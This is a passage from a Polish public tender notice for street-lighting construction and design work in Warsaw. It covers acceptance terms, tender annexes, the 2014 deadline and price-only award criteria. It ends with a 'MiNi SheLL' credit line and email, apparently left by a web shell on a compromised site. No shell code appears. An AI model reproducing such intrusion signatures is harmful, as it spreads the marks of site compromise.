Muszą spełniać normy i posiadać certyfikaty lub świadectwa zgodności oraz być zgodne z opiniami Wydziału Estetyki Przestrzeni Publicznej Biura Architektury i Planowania Przestrzennego Urzędu Miasta Stołecznego Warszawy.

1.4.Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
- bezusterkowego protokołu odbioru,
-zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
Wykonanie dokumentacji powykonawczej na budowę, modernizację, przebudowę oświetlenia ulicznego nastąpi na podstawie projektu lub ustaleń przeprowadzonych w dniu wprowadzenia.
Wykonanie dokumentacji projektowej na budowę, modernizację, przebudowę oświetlenia ulicznego nastąpi na podstawie materiałów i ustaleń przekazanych w dniu wprowadzenia.

Szczegółowy opis przedmiotu zamówienia dla Części 3 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6c) do SIWZ
b)przedmiar robót - załącznik nr 7c) do SIWZ;
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8c) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, 
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

Termin wykonania zamówienia ustala się od dnia zawarcia umowy do dnia 10.12.2014 r. lub do wyczerpania maksymalnego wynagrodzenia, o którym mowa w § 8 ust. 1 wzoru umowy (stanowiącego załącznik nr 6c) do SIWZ dla Części 3 w zależności od tego które z tych zdarzeń nastąpi jako pierwsze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9, 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com